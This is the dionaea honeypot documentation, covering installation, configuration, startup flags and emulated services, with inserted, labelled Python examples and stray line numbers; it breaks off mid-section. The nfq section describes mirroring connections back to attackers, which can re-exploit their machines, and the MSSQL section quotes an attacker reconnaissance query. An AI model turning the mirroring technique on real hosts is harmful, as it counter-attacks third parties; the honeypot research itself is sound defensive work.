DIONAEA(1)                          dionaea                         DIONAEA(1)

NAME

       dionaea - dionaea Documentation

       Dionaea is meant to be a nepenthes successor, embedding Python as
       scripting language, using libemu to detect shellcode, and supporting
       IPv6 and TLS.

       WARNING:
          The documentation is work in progress.

INTRODUCTION

   How it works
       dionaea's intention is to trap malware exploiting vulnerabilities
       exposed by services offered to a network; the ultimate goal is gaining
       a copy of the malware.

   Security
       As software is likely to have bugs, bugs in software offering network
       services can be exploitable, and dionaea is software offering network
       services, it is likely that dionaea has exploitable bugs.

       Of course we try to avoid it, but if nobody would fail when trying
       hard, we would not need software such as dionaea.

       So, in order to minimize the impact, dionaea can drop privileges and
       chroot.

       To be able to run certain actions which require privileges after
       dionaea has dropped them, dionaea creates a child process at startup
       and asks the child process to run actions which require elevated
       privileges. This does not guarantee anything, but it should be harder
       to gain root access to the system from an unprivileged user in a
       chroot environment.
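       The child-process arrangement just described, as an added example in
       Python (not dionaea's own code, which does this in C): a helper is
       forked while the process is still root, the parent then chroots and
       drops to the unprivileged user, and from then on only the small
       allow-list of operations the helper was started with can be requested
       over the socket pair. The `whoami` operation, the JSON message format
       and the use of `nobody`/`nogroup` (taken from the startup examples
       later in this page) are assumptions made for the example.

```python
"""Privilege separation: fork a helper while still privileged, then drop.

Added example in the style of the dionaea documentation; not dionaea's code.
"""
import grp
import json
import os
import pwd
import socket


def _helper_loop(conn, allowed):
    """Serve requests from the unprivileged parent. Only operations in the
    allow-list are executed, so a compromised parent cannot turn the helper
    into a generic root shell."""
    while True:
        data = conn.recv(4096)
        if not data:  # parent closed its end: shut down
            return
        req = json.loads(data.decode())
        handler = allowed.get(req.get("op"))
        if handler is None:
            reply = {"ok": False, "error": "operation not allowed"}
        else:
            try:
                reply = {"ok": True, "result": handler(req)}
            except Exception as exc:  # report the failure, never crash
                reply = {"ok": False, "error": str(exc)}
        conn.sendall(json.dumps(reply).encode())


def start_privileged_helper(allowed):
    """Fork the helper *before* privileges are dropped. Returns the parent's
    socket and the helper's pid."""
    parent_sock, child_sock = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        parent_sock.close()
        try:
            _helper_loop(child_sock, allowed)
        finally:
            os._exit(0)
    child_sock.close()
    return parent_sock, pid


def drop_privileges(user, group, chroot_dir=None):
    """Order matters: chroot while still root, then set the group and clear
    supplementary groups, then the uid; after setuid neither could be changed.
    Returns False when not running as root (nothing to drop)."""
    if os.geteuid() != 0:
        return False
    uid = pwd.getpwnam(user).pw_uid
    gid = grp.getgrnam(group).gr_gid
    if chroot_dir:
        os.chroot(chroot_dir)
        os.chdir("/")
    os.setgroups([])
    os.setgid(gid)
    os.setuid(uid)
    # Probe that root cannot be regained; an incomplete drop must be fatal.
    try:
        os.setuid(0)
    except PermissionError:
        return True
    raise RuntimeError("privilege drop failed: setuid(0) still succeeds")


def request(sock, op, **args):
    sock.sendall(json.dumps({"op": op, **args}).encode())
    return json.loads(sock.recv(4096).decode())


def demo():
    """Runs unprivileged too: the helper still answers, only the drop is
    skipped (returns None when the user/group is absent or setuid is denied)."""
    allowed = {
        # Hypothetical privileged action: report the helper's own ids.
        "whoami": lambda req: {"uid": os.getuid(), "euid": os.geteuid()},
    }
    helper, pid = start_privileged_helper(allowed)
    try:
        dropped = drop_privileges("nobody", "nogroup")
    except (KeyError, PermissionError):
        dropped = None
    ok = request(helper, "whoami")
    refused = request(helper, "open_raw_socket")  # not in the allow-list
    helper.close()
    os.waitpid(pid, 0)
    return dropped, ok, refused
```

       The final setuid(0) probe is what turns an incomplete drop into a
       hard failure instead of a honeypot that silently keeps running as
       root; the allow-list keeps the helper from undoing the whole
       exercise.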

   Network Connectivity
       Given the software's intended use, network I/O is crucial. All network
       I/O is done within the main process in a so-called non-blocking
       manner. To understand non-blocking, imagine you have many pipes in
       front of you; these pipes can send you something, and you can put
       something into a pipe. If you want to put something into a pipe while
       it is crowded, you'd have to wait; if you want to get something from a
       pipe and there is nothing, you'd have to wait too. Doing this pipe
       game non-blocking means you won't wait for the pipes to become
       writable/readable: you get something off a pipe once data arrives, and
       write once the pipe is not crowded. If you want to write a large chunk
       to a pipe and the pipe is crowded after a small piece, you note the
       rest of the chunk you wanted to write and wait for the pipe to get
       ready.

       DNS resolves are done using libudns, which is a neat non-blocking DNS
       resolving library with support for AAAA records and chained CNAMEs. So
       much about non-blocking.

       dionaea uses libev to get notified once it can act on a socket, read
       or write.

       dionaea can offer services via TCP/UDP and TLS for IPv4 and IPv6, and
       can apply rate limiting and accounting limits per connection to TCP
       and TLS connections - if required.


INSTALLATION

       At the time of writing the best choice to install dionaea on a server
       is to use Ubuntu 14.04, but below you can find how to install it (from
       source) on other distributions/operating systems.

   Basic stuff
   Download the source code
       You can download the source code from the release page or by using the
       git command.

          git clone https://github.com/DinoTools/dionaea.git
          cd dionaea

   Arch Linux
       Packages for dionaea are available from the Arch User Repository (AUR).
       Use a package manager like yaourt that can handle and install packages
       from the AUR.

       Before you start, install the required build tools.

          $ yaourt -S base-devel

       After the requirements have been installed successfully you can install
       dionaea. This will check out the latest sources from the git
       repository, run the build process and install the package.

          $ yaourt -S dionaea-git

       After the installation has been completed you may want to edit the
       config file /etc/dionaea/dionaea.conf. If everything looks fine the
       dionaea service can be started by using the following command.

          $ sudo systemctl start dionaea

       The log files and everything captured can be found in the directory
       /var/lib/dionaea/.

   Ubuntu 16.04
   From Source
       Before you start, download the source code of dionaea.

       Install required build dependencies before configuring and building
       dionaea. (‘ttf-liberation’ is required by ‘util/gnuplotsql.py’)

          sudo apt-get install \
              autoconf \
              automake \
              build-essential \
              check \
              cython3 \
              libcurl4-openssl-dev \
              libemu-dev \
              libev-dev \
              libglib2.0-dev \
              libloudmouth1-dev \
              libnetfilter-queue-dev \
              libnl-3-dev \
              libpcap-dev \
              libssl-dev \
              libtool \
              libudns-dev \
              python3 \
              python3-dev \
              python3-bson \
              python3-yaml \
              ttf-liberation

       After all dependencies have been installed successfully run autoreconf
       to build or rebuild the build scripts.

          autoreconf -vi

       Run configure to configure the build scripts.

          ./configure \
              --disable-werror \
              --prefix=/opt/dionaea \
              --with-python=/usr/bin/python3 \
              --with-cython-dir=/usr/bin \
              --with-ev-include=/usr/include/ \
              --with-ev-lib=/usr/lib \
              --with-emu-lib=/usr/lib/libemu \
              --with-emu-include=/usr/include \
              --with-nl-include=/usr/include/libnl3 \
              --with-nl-lib=/usr/lib

       Now you should be able to run make to build and make install to
       install the honeypot.

          make
          sudo make install

       The new honeypot can be found in the directory /opt/dionaea.

   Ubuntu 14.04
   Package based
       Nightly packages are provided in a Personal Package Archive (PPA).
       Before you start you should update all packages to get the latest
       security updates.

          $ sudo apt-get update
          $ sudo apt-get dist-upgrade

       First of all, install the tools to easily manage PPA resources.

          $ sudo apt-get install software-properties-common

       After the required tools have been installed you can add the PPA and
       update the package cache.

          $ sudo add-apt-repository ppa:honeynet/nightly
          $ sudo apt-get update

       If everything worked without any errors you should be able to install
       the dionaea package.

          $ sudo apt-get install dionaea

       After the installation has been completed you may want to edit the
       config file /etc/dionaea/dionaea.conf. If everything looks fine the
       dionaea service can be started by using the following command.

          $ sudo service dionaea start

       The log files can be found in the directory /var/log/dionaea/ and
       everything else captured and logged by the honeypot can be found in
       the directory /var/lib/dionaea/.

   From Source
       Before you start, download the source code of dionaea.

       Install required build dependencies before configuring and building
       dionaea.

          $ sudo apt-get install \
              autoconf \
              automake \
              build-essential \
              check \
              cython3 \
              libcurl4-openssl-dev \
              libemu-dev \
              libev-dev \
              libglib2.0-dev \
              libloudmouth1-dev \
              libnetfilter-queue-dev \
              libnl-dev \
              libpcap-dev \
              libssl-dev \
              libtool \
              libudns-dev \
              python3 \
              python3-dev \
              python3-bson \
              python3-yaml

       After all dependencies have been installed successfully run autoreconf
       to build or rebuild the build scripts.

          autoreconf -vi

       Run configure to configure the build scripts.

          ./configure \
              --disable-werror \
              --prefix=/opt/dionaea \
              --with-python=/usr/bin/python3 \
              --with-cython-dir=/usr/bin \
              --with-ev-include=/usr/include \
              --with-ev-lib=/usr/lib \
              --with-emu-lib=/usr/lib/libemu \
              --with-emu-include=/usr/include \
              --with-nl-include=/usr/include/libnl3 \
              --with-nl-lib=/usr/lib

       Now you should be able to run make to build and make install to
       install the honeypot.

          make
          sudo make install

       The new honeypot can be found in the directory /opt/dionaea.

   3rd-party packages
       The packages below are 3rd party provided, which is appreciated. If
       you have compiled a package for your own distribution, just send me the
       link or make a pull request.


CONFIGURATION

       If you want to change the software, it is really important to
       understand how it works, so please take the time to do so.
       dionaea.cfg is the main configuration file. In the example below you
       can see the default configuration.

       dionaea.cfg

          [dionaea]
          download.dir=/var/lib/dionaea/binaries/
          modules=curl,python,nfq,emu,pcap
          processors=filter_streamdumper,filter_emu

          listen.mode=getifaddrs
          # listen.addresses=127.0.0.1
          # listen.interfaces=eth0,tap0

          # Country
          # ssl.default.c=GB
          # Common Name/domain name
          # ssl.default.cn=
          # Organization
          # ssl.default.o=
          # Organizational Unit
          # ssl.default.ou=

          [logging]
          default.filename=/var/log/dionaea/dionaea.log
          default.levels=all
          default.domains=*

          errors.filename=/var/log/dionaea/dionaea-errors.log
          errors.levels=warning,error
          errors.domains=*

          [processor.filter_emu]
          name=filter
          config.allow.0.protocols=smbd,epmapper,nfqmirrord,mssqld
          next=emu

          [processor.filter_streamdumper]
          name=filter
          config.allow.0.types=accept
          config.allow.1.types=connect
          config.allow.1.protocols=ftpctrl
          config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
          next=streamdumper

          [processor.streamdumper]
          name=streamdumper
          config.path=/var/lib/dionaea/bistreams/%Y-%m-%d/

          [processor.emu]
          name=emu
          config.limits.files=3
          #512 * 1024
          config.limits.filesize=524288
          config.limits.sockets=3
          config.limits.sustain=120
          config.limits.idle=30
          config.limits.listen=30
          config.limits.cpu=120
          #// 1024 * 1024 * 1024
          config.limits.steps=1073741824

          [module.nfq]
          queue=2

          [module.nl]
          # set to yes in case you are interested in the mac address  of the remote (only works for lan)
          lookup_ethernet_addr=no

          [module.python]
          imports=dionaea.log,dionaea.services,dionaea.ihandlers
          sys_paths=default
          service_configs=/etc/dionaea/services-enabled/*.yaml
          ihandler_configs=/etc/dionaea/ihandlers-enabled/*.yaml

          [module.pcap]
          any.interface=any

   dionaea
       download.dir
          Global download directory used by some ihandlers.

       listen.mode
          There are basically three modes how dionaea can bind the services to
          IP addresses.

            getifaddrs - auto
                   This will get a list of all IP addresses of all available
                   interfaces and bind the services to each IP. It is also
                   possible to specify a list of interfaces to use by using
                   the listen.interfaces parameter.

            manual - your decision
                   In this mode you have to specify an additional parameter
                   listen.addresses. This is a comma separated list of IP
                   addresses dionaea should bind the services to.

            nl - will require a list of interfaces
                   You have to specify a comma separated list of interface
                   names with the listen.interfaces parameter. If an IP
                   address is added to an interface or removed from an
                   interface dionaea will launch or stop all services for
                   this IP.

       modules
          Comma separated list of modules.

       processors
          Comma separated list of processors.

       ssl.default.c
          Two letter id of the Country.

       ssl.default.cn
          The Common Name/domain name of the generated SSL/TLS certificate.

       ssl.default.o
          The Organization name.

       ssl.default.ou
          The name of the Organizational Unit.

   Logging
       dionaea has a general application log. These logs are meant to be used
       for debugging and to track errors. It is not recommended to analyse
       these files to track attacks.

       filename
          The filename of the logfile.

       levels
          Only log messages that match the specified log level get logged to
          the logfile.

          Available log levels:

          • debug

          • info

          • warning

          • error

          • critical

          • all = Special log level including all log levels

          Examples:

          Log only messages with level warning and error

              errors.levels=warning,error

          Log all log messages but exclude messages with log level debug

              errors.levels=all,-debug

       domains
          Only log messages in a specified domain.
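       A filter implementing the levels/domains syntax described here, as an
       added Python example rather than dionaea's own logging code: `all`
       expands to every level, a leading `-` removes an entry, and domain
       names are matched with the `*`/`?` wildcards that the -L startup flag
       documents in RUNNING DIONAEA. The level set includes `message`
       because the -l help output lists it; the sample records and their
       domain names are constructed for the example.

```python
"""Level/domain log filter in the dionaea.cfg syntax (added example)."""
import fnmatch

# Levels as listed by `dionaea -H` for the -l flag.
LEVELS = ("debug", "info", "message", "warning", "error", "critical")


def parse_levels(spec):
    """'all,-debug' -> every level except debug. Entries are applied left
    to right; unknown names raise so a typo cannot silently log nothing."""
    selected = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        negate = item.startswith("-")
        name = item[1:] if negate else item
        names = set(LEVELS) if name == "all" else {name}
        unknown = names - set(LEVELS)
        if unknown:
            raise ValueError(f"unknown log level(s): {sorted(unknown)}")
        if negate:
            selected -= names
        else:
            selected |= names
    return selected


def parse_domains(spec):
    """Split '*,-py*' into (include patterns, exclude patterns)."""
    include, exclude = [], []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if item.startswith("-"):
            exclude.append(item[1:])
        else:
            include.append(item)
    return include, exclude


class LogFilter:
    def __init__(self, levels, domains):
        self.levels = parse_levels(levels)
        self.include, self.exclude = parse_domains(domains)

    def domain_matches(self, domain):
        # An exclude pattern wins over any include pattern.
        if any(fnmatch.fnmatchcase(domain, p) for p in self.exclude):
            return False
        return any(fnmatch.fnmatchcase(domain, p) for p in self.include)

    def accepts(self, level, domain):
        return level in self.levels and self.domain_matches(domain)


# Constructed sample records: (level, domain, message).
SAMPLE_RECORDS = [
    ("debug", "connection", "new connection accepted"),
    ("warning", "python", "service config missing"),
    ("error", "connection", "bind failed"),
    ("info", "pcap", "rejected SYN seen"),
]


def filter_records(levels, domains, records=SAMPLE_RECORDS):
    """Return the records that a [logging] entry with these settings keeps."""
    f = LogFilter(levels, domains)
    return [r for r in records if f.accepts(r[0], r[1])]
```

       With `errors.levels=warning,error` and `errors.domains=*` only the
       second and third sample records reach the errors log, which is the
       behaviour the default configuration above relies on.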

   Modules
       Only modules specified by the modules value in the dionaea section are
       loaded during start up.

       Every module might have its own config section with additional config
       parameters. The section name consists of the prefix module and the
       module name separated by a dot (.).

       See the module/index documentation to find more information on how to
       configure the modules.

   Processors
       The specified processors will be used as an entry point in the
       processing pipeline. In most cases the initial processor will be a
       filter processor <processor/filter>. The next processor in the
       pipeline is specified by the next parameter.

       See the processor/index documentation to find more information on how
       to configure the processors.


RUNNING DIONAEA

       The software has some flags you can provide at startup: the -h flag
       shows the help, the -H flag includes the default values.

          $ /opt/dionaea/bin/dionaea -H
            -c, --config=FILE               use FILE as configuration file
                                              Default value/behaviour: /opt/dionaea/etc/dionaea/dionaea.cfg
            -D, --daemonize                 run as daemon
            -g, --group=GROUP               switch to GROUP after startup (use with -u)
                                              Default value/behaviour: keep current group
            -G, --garbage=[collect|debug]   garbage collect,  usefull to debug memory leaks,
                                            does NOT work with valgrind
            -h, --help                      display help
            -H, --large-help                display help with default values
            -l, --log-levels=WHAT           which levels to log, valid values
                                            all, debug, info, message, warning, critical, error
                                            combine using ',', exclude with - prefix
            -L, --log-domains=WHAT          which domains use * and ? wildcards, combine using ',',
                                            exclude using -
            -u, --user=USER                 switch to USER after startup
                                              Default value/behaviour: keep current user
            -p, --pid-file=FILE             write pid to file
            -r, --chroot=DIR                chroot to DIR after startup
                                              Default value/behaviour: don't chroot
            -V, --version                   show version
            -w, --workingdir=DIR            set the process' working dir to DIR
                                              Default value/behaviour: /opt/dionaea

          examples:
              # dionaea -l all,-debug -L '*'
              # dionaea -l all,-debug -L 'con*,py*'
              # dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/var/run/dionaea.pid


INTEGRATION

       A list of applications and tools to collect information exported by
       dionaea.

   DTAG Community Honeypot Project
       The DTAG Community Honeypot Project was started in 2010 by a small
       group of enthusiasts at Deutsche Telekom. They are maintaining T-Pot,
       a Multi-Honeypot Platform. It is based on well established honeypots
       including dionaea.

       • Website: DTAG Community Honeypot Project

       • Status: active

   DionaeaFR
       DionaeaFR is a web-frontend to display attack information. It uses the
       SQLite database provided by the log_sqlite ihandler.

       • Website: DionaeaFR

       • Status: unmaintained since 2014

   DIY with log_json
       You can use the log_json incident handler in combination with an ELK
       stack to collect, aggregate and visualize attack information.

       • Website: ELK stack

       • Status: active

   Modern Honey Network (mhn)
       A tool to deploy honeypots, collect attack information and display
       aggregated statistics.

       • Website: Modern Honey Network

       • Status: active, but deploys a pre-0.2 (2014) version of dionaea by
         default.


MODULES

       The subsection name is the name of the module dionaea will try to
       load. Most modules have rather simplistic names: the pcap module will
       use libpcap, the curl module libcurl, the emu module libemu … The
       python module is special, as the python module can load python
       scripts, which offer services, and each service can have its own
       options.

       List of available modules

   curl
       The curl module is used to transfer files from and to servers. It is
       used to download files via http as well as for submitting files to
       3rd parties.

   emu
       The emu module is used to detect, profile and - if required - execute
       shellcode.

   pcap
       The pcap module uses the libpcap library to detect rejected connection
       attempts, so even if we do not accept a connection, we can use the
       information that somebody wanted to connect there.

   python
       The python module allows using the python interpreter in dionaea, and
       allows controlling some scripts dionaea uses.


SERVICE

       Network services speak a certain language; this language is called a
       protocol. When we started deploying honeypots, you could trap worms
       just by opening a single port and waiting for them to connect and send
       you a URL where you could download a copy of the worm. The service
       getting attacked was the backdoor of the bagle mailworm, and it did
       not require any interaction. Later on, the exploitation of real
       services got more complex, and you had to reply something to the worm
       to fool it. Nowadays worms use APIs to access services before sending
       their payload. To allow easy adjustments to the protocol, dionaea
       implements the protocols in python. There is a glue between the
       network layer, which is done in the C programming language, and the
       embedded python scripting language, which allows using the
       non-blocking connections in python. This has some benefits: for
       example we can use non-blocking tls connections in python, and we even
       get rate limiting on them (if required), where python's own io does
       not offer such things. On the other hand, it is much more comfortable
       to implement protocols in python than doing the same in C.

       List of available services

   Black hole
       The black hole module can be used to bind a service to a port. The
       service does not respond to any submitted data, but the bistreams can
       be used to create new modules.

   Example config
       services/blackhole.yaml

          - name: blackhole
            config:
              services:
                # Telnet
                - port: 23
                  protocol: tcp

                # DNS
                - port: 53
                  protocol: udp
                - port: 53
                  protocol: tcp

                # NTP
                - port: 123
                  protocol: udp


   EPMAP
   Example config
       services/epmap.yaml

          - name: epmap


   FTP
       Dionaea provides a basic ftp server on port 21; it can create
       directories and upload and download files. From my own experience
       there are very few automated attacks on ftp services and I'm yet to
       see something interesting happening on port 21.

   Example config
       services/ftp.yaml

          - name: ftp
            config:
              root: /var/lib/dionaea/roots/ftp
              response_messages:
                welcome_msg: 220 DiskStation FTP server ready.


   HTTP
       Dionaea supports http on port 80 as well as https, but there is no code
       making use of the data gathered on these ports. For https, the
       self-signed ssl certificate is created at startup.

   Configure
       Example configuration:

          - name: http
            config:
              root: "var/dionaea/wwwroot"

       default_headers
          Default header fields are sent if none of the other header patterns
          match.

       global_headers
          Global header fields are added to all response headers.

       headers
          List of header fields to be used in the response header. Only
          applied if filename_pattern, status_code and methods match. The
          first match in the list is used.

       max_request_size
          Maximum size in kbytes of the request. 32768 = 32MB

       root
          The root directory to serve files from.
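       Header selection following the rules just listed, as an added Python
       example (not the http service's own implementation). The config dict
       is constructed in the shape of services/http.yaml; the second headers
       entry with status_code and methods, the assumption that an entry
       lacking those keys matches any status code or method, and filling the
       {content_length}/{connection} placeholders from a per-response dict
       are assumptions made for the example.

```python
"""Response header selection for an http honeypot config (added example)."""
import re

# Constructed config in the shape of services/http.yaml.
HTTP_CONFIG = {
    "max_request_size": 32768,  # kbytes, i.e. 32 MB
    "global_headers": [["Server", "nginx"]],
    "default_headers": [
        ["Content-Type", "text/html; charset=utf-8"],
        ["Content-Length", "{content_length}"],
    ],
    "headers": [
        {
            "filename_pattern": r".*\.php",
            "headers": [
                ["Content-Type", "text/html; charset=utf-8"],
                ["Content-Length", "{content_length}"],
                ["Connection", "{connection}"],
                ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"],
            ],
        },
        {   # assumed entry: restricted to 404 responses to GET requests
            "filename_pattern": r".*",
            "status_code": 404,
            "methods": ["GET"],
            "headers": [
                ["Content-Type", "text/html"],
                ["Content-Length", "{content_length}"],
            ],
        },
    ],
}


def _entry_matches(entry, filename, status_code, method):
    """All three conditions must hold; a missing status_code/methods key is
    treated as 'any' (assumption for this example)."""
    if re.fullmatch(entry["filename_pattern"], filename) is None:
        return False
    if "status_code" in entry and entry["status_code"] != status_code:
        return False
    if "methods" in entry and method not in entry["methods"]:
        return False
    return True


def select_headers(config, filename, status_code, method, values):
    """First matching `headers` entry wins, else default_headers; the
    global_headers are prepended in every case. Placeholders such as
    {content_length} are filled from `values`."""
    for entry in config.get("headers", []):
        if _entry_matches(entry, filename, status_code, method):
            chosen = entry["headers"]
            break
    else:
        chosen = config.get("default_headers", [])
    result = []
    for name, value in list(config.get("global_headers", [])) + list(chosen):
        result.append((name, value.format(**values)))
    return result


def request_too_large(config, request_bytes):
    """max_request_size is configured in kbytes, so convert before comparing."""
    limit = config.get("max_request_size", 32768) * 1024
    return request_bytes > limit
```

       Keeping the unit conversion in one place matters: a request limit
       compared in bytes against a value meant as kbytes would be 1024 times
       too strict and silently drop legitimate scanner traffic you wanted to
       record.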
643
644   Example config
645       services/http.yaml
646
647          - name: http
648            config:
649              root: "/var/lib/dionaea/roots/www"
650              ports:
651                - 80
652              ssl_ports:
653                - 443
654              max_request_size: 32768 # maximum size in kbytes of the request (32MB)
655              global_headers:
656                - ["Server", "nginx"]
657              headers:
658                - filename_pattern: ".*\\.php"
659                  headers:
660                    - ["Content-Type", "text/html; charset=utf-8"]
661                    - ["Content-Length", "{content_length}"]
662                    - ["Connection", "{connection}"]
663                    - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
664              # soap_enabled: false
665              template:
666                # set to true to enable template processing
667                # this feature requires jinja2 template engine http://jinja.pocoo.org/
668                enabled: false
669                file_extension: .j2
670                path: "/var/lib/dionaea/share/python/http/template/nginx"
671                templates:
672                  autoindex:
673                    filename: autoindex.html.j2
674                  error_pages:
675                    - filename: error.html.j2
676                    # - filename: error/{code}.html.j2
677                # used to specify additional template values
678                values:
679                  # full_name: nginx/1.1
680
681
682   Additional examples
683       Set the Server response field.
684
685          - name: http
686            config:
687              global_headers:
688                - ["Server", "nginx"]
689
690       Define headers to use if the filename matches a pattern.
691
692          - name: http
693            config:
694              headers:
695                - filename_pattern: ".*\\.php"
696                  headers:
697                    - ["Content-Type", "text/html; charset=utf-8"]
698                    - ["Content-Length", "{content_length}"]
699                    - ["Connection", "{connection}"]
700                    - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
701
702   Memache
703       Dionaea can emulate a very basic memcached server.
704
705   Configure
706   Example config
707       services/memcache.yaml
708
709          - name: memcache
710
711
712   Mirror
713   Example config
714       services/mirror.yaml
715
716          - name: mirror
717
718
719   MongoDB
720       This module add initial support to emulates a MongoDB server  with  the
721       dionaea honeypot.  At the moment it is very limited and the functional‐
722       ity might be improved in one of the next releases.
723
724   Requirements
725       • bson module for Python 3
726
727   Example config
728       services/mongo.yaml
729
730          - name: mongo
731
732
733   MQTT
734   Example config
735       services/mqtt.yaml
736
737          - name: mqtt
738
739
740   MSSQL
741       This module implements the Tabular Data Stream protocol which  is  used
742       by  Microsoft  SQL Server. It listens to tcp/1433 and allows clients to
743       login. It can decode queries run on the database, but as  there  is  no
744       database,  dionaea  can’t  reply, and there is no further action. Typi‐
745       cally we always get the same query:
746
747          exec sp_server_info 1 exec sp_server_info 2 exec sp_server_info 500 select 501,NULL,1 where 'a'='A' select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id set textsize 2147483647 set arithabort on
748
749       Refer             to              the              blog              <‐
750       http://carnivore.it/2010/09/11/mssql_attacks_examined>  for more infor‐
751       mation.  Patches would be appreciated.
752
753   Example config
754       services/mssql.yaml
755
756          - name: mssql
757
758
759   MySQL
760       This module implements the MySQL wire stream protocol -  backed  up  by
761       sqlite  as  database.  Please  refer to 2011-05-15 Extending Dionaea <‐
762       http://carnivore.it/2011/05/15/extending_dionaea> for more information.
763
764   Example config
765       services/mysql.yaml
766
767          - name: mysql
768            config:
769              databases:
770                information_schema:
771                  path: ":memory:"
772                # example how to extend this
773                # just provide a databasename and path to the database
774                # the database can be altered by attackers, so ... better use a copy
775          #      psn:
776          #        path: "/path/to/cc_info.sqlite"
777
778
779   nfq
780       The python nfq script is the counterpart to the nfq module.  While  the
781       nfq  module interacts with the kernel, the nfq python script takes care
782       of the required steps to start a new service on the ports.  nfq can in‐
783       tercept  incoming  tcp connections during the tcp handshake giving your
784       honeypot the possibility to provide service  on  ports  which  are  not
785       served by default.
786
787       As  dionaea  can  not  predict which protocol will be spoken on unknown
788       ports, neither implement the protocol by itself, it  will  connect  the
789       attacking host on the same port, and use the attackers server side pro‐
790       tocol implementation to reply to the client requests  of  the  attacker
791       therefore  dionaea can end up re?exploiting the attackers machine, just
792       by sending him the exploit he sent us.
793
794       The technique is a brainchild of Tillmann Werner, who  used  it  within
795       his  honeytrap  <http://honeytrap.carnivore.it> honeypot.  Legal bound‐
796       aries to such behaviour may be different in each country,  as  well  as
797       ethical boundaries for each individual.  From a technical point of view
798       it works, and gives good results.  Learning from the best, I decided to
799       adopt this technique for dionaea.  Besides the legal and ethical issues
800       with this approach, there are some technical things which  have  to  be
801       mentioned
802
803       port scanning
804          If your honeypot gets port scanned, it would open a service for each
805          port scanned; in the worst case you’d end up offering 64k services
806          per ip scanned.  By default you’d run out of fds at about 870 ser‐
807          vices offered, and experience weird behaviour.  Therefore the impact
808          of port scanning has to be limited.  The KISS approach taken here is
809          a sliding window of throttle.window seconds.  Each slot in this
810          sliding window represents a second, and we increment this slot for
811          each connection we accept.  Before we accept a connection, we check
812          if the sum of all slots is below throttle.limits.total, else we do
813          not create a new service.  If the sum is below the limit, we check
814          if the current slot is below the slot limit (throttle.limits.slot)
815          too; if both conditions hold, we create a new service.  If one of
816          them fails, we do not spawn a new service, and let nfqueue process
817          the packet.  There are two ways to process packets which got throttled:
818
819          • NF_ACCEPT (=1), which will let the packet pass the kernel, and as
820            there is no service listening, the packet gets rejected.
821
822          • NF_DROP (=0), which will drop the packet in the kernel; the remote
823            does not get any answer to its SYN.
824
825          I prefer NF_DROP, as port scanners such as nmap tend to limit  their
826          scanning speed, once they notice packets get lost.
827
828       recursive-self-connecting
829          Assume some shellcode or download instruction makes dionaea
830
831          • connect to itself on an unbound port
832
833          • nfq intercepts the attempt
834
835          • spawns a service
836
837          • accepts the connection #1
838
839          • creates  mirror connection for connection #1 by connecting the re‐
840            motehost (itself) on the same port #2
841
842          • accepts connection #2 as connection #3
843
844          • creates mirror connection for connection #3 by connecting the  re‐
845            motehost (itself) on the same port #4
846
847          • …
848
849          Such a recursive loop has to be avoided for obvious reasons.  There‐
850          fore dionaea checks if the remote host connecting to an nfq mirror is
851          a local address using ‘getifaddrs’ and drops local connections.
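       The throttle and the local-address guard described above, modelled in
       Python as an added example (this is not dionaea's own code).  The names
       NfqThrottle, is_local_address, handle_syn and simulate_port_scan are
       invented for the illustration, the addresses are constructed, and the
       set of local interface addresses is passed in explicitly because the
       Python standard library has no getifaddrs wrapper.

```python
import ipaddress

# nfq verdicts for throttled SYNs, as named in the text above
NF_DROP = 0     # dropped in the kernel: the remote gets no answer to its SYN
NF_ACCEPT = 1   # passed to the kernel: no listener, so the SYN is rejected


class NfqThrottle:
    """Sliding window of `window` one-second slots (throttle.window).

    A new service is spawned only if the sum over all slots is below
    throttle.limits.total AND the current slot is below
    throttle.limits.slot; the accepted connection is then counted in the
    current slot.
    """

    def __init__(self, window=30, total=30, slot=30):
        self.window = window
        self.total = total
        self.slot = slot
        self._slots = {}  # absolute second -> connections accepted in it

    def _expire(self, now_sec):
        # keep only the slots inside the window: (now - window, now]
        cutoff = now_sec - self.window
        for sec in [s for s in self._slots if s <= cutoff]:
            del self._slots[sec]

    def allow(self, now):
        """Return True (and count the connection) if a service may be spawned."""
        now_sec = int(now)
        self._expire(now_sec)
        if sum(self._slots.values()) >= self.total:
            return False
        if self._slots.get(now_sec, 0) >= self.slot:
            return False
        self._slots[now_sec] = self._slots.get(now_sec, 0) + 1
        return True


def is_local_address(remote_ip, local_addrs):
    """True if the peer is one of our own addresses (or loopback).

    dionaea uses getifaddrs() for this; here the interface addresses are
    passed in as `local_addrs` (an assumption made for the example).
    """
    addr = ipaddress.ip_address(remote_ip)
    return addr.is_loopback or addr in {ipaddress.ip_address(a) for a in local_addrs}


def handle_syn(throttle, remote_ip, now, local_addrs, nfaction=NF_DROP):
    """Decide what happens to one intercepted SYN.

    Returns "local" when the peer is ourselves (the mirror would otherwise
    connect back to dionaea and recurse), "spawn" when a mirror service is
    created, or the configured nfq verdict when the throttle rejects it.
    """
    if is_local_address(remote_ip, local_addrs):
        return "local"
    if throttle.allow(now):
        return "spawn"
    return nfaction


def simulate_port_scan(n_syns=100, window=30, total=30, slot=30):
    """Constructed scenario: `n_syns` SYNs from one scanner inside a single
    second, one more SYN after the window has slid, and one SYN from the
    sensor's own address.  Returns the decisions for inspection."""
    throttle = NfqThrottle(window=window, total=total, slot=slot)
    local = ["192.0.2.10"]            # constructed sensor address (TEST-NET-1)
    scanner = "198.51.100.7"          # constructed scanner address (TEST-NET-2)
    burst = [handle_syn(throttle, scanner, 0.0, local) for _ in range(n_syns)]
    return {
        "spawned": burst.count("spawn"),
        "dropped": burst.count(NF_DROP),
        "after_window": handle_syn(throttle, scanner, float(window), local),
        "self_connect": handle_syn(throttle, "192.0.2.10", 0.0, local),
    }


if __name__ == "__main__":
    print(simulate_port_scan())
```

       With the default limits, a burst of 100 SYNs spawns 30 services and
       drops the other 70, and the scanner is served again once the window
       has moved on.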
852
853       So much about the known problems and workarounds …
854
855       If  you  read  that  far,  you want to use it despite the technical/le‐
856       gal/ethical problems.  So … You’ll need iptables, and  you’ll  have  to
857       tell  iptables  to  enqueue packets which would establish a new connec‐
858       tion.  I recommend something like this:
859
